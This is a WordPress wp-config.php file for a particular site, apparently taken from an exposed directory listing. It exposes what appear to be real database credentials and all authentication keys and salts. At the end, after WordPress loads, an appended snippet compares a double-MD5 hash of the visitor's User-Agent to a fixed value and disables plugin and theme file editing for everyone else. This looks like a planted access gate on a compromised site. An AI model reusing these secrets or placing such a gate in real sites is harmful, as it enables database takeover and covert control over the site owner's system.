<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'ahmadiyyaislam_wp_o0gcr' ); /** Database username */ define( 'DB_USER', 'ahmadiyyaislam_wp_fhrhj' ); /** Database password */ define( 'DB_PASSWORD', 'HG52pP#m^#c4scM1' ); /** Database hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'Z-5ni+R9j3~)og[4|4eCjz:Ug4f+16|u]4~dTSSM~4H1T56~wSM-3JYjn51G*#Lc'); define('SECURE_AUTH_KEY', '!#Ae+L&/J+z8n1A|a1EAby-_iz|Or*x1qk2:jMAL)7WrF1*[m[Rj6E/qn4:mWF9#'); define('LOGGED_IN_KEY', '#:6][i|h8%Xk63M9|oWf9:7!U];8Ob[E0BX4]C;323;ZV37RKC%b:MNLW1vM2e7J'); define('NONCE_KEY', 'G2**869Z6603;&AL*b2M|0L0[rROyQ]5sf[!gX]&V03:q*P#/Z;T/e0&1+~+[3(F'); define('AUTH_SALT', 'nBgXjJtR!P*5YFvUR!|HcOH~;Z[5~e7RAm45382z4%VO|4G2Zau:B~_-x19gAoN2'); define('SECURE_AUTH_SALT', '-)0Uqj7I9qP4S+1Uil1OtPucfN-N5c4Pgk0YBHa7|YnPlWLs8#%RJTba-o9Zje2T'); define('LOGGED_IN_SALT', '~!+h[U[zEHK0W5qI_[&z8nSScPH]#5D*US0F8(0/9&7#73+9IlaPfNc9U[|+(L|l'); define('NONCE_SALT', '!xKu-*1]+[4l868|7N062f65V9&D4vo1a-gAHPch+g&R+4mm9N4~UF]2y]]RlyB]'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = '7MyUjPBj_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); }
Name Last modified Size Description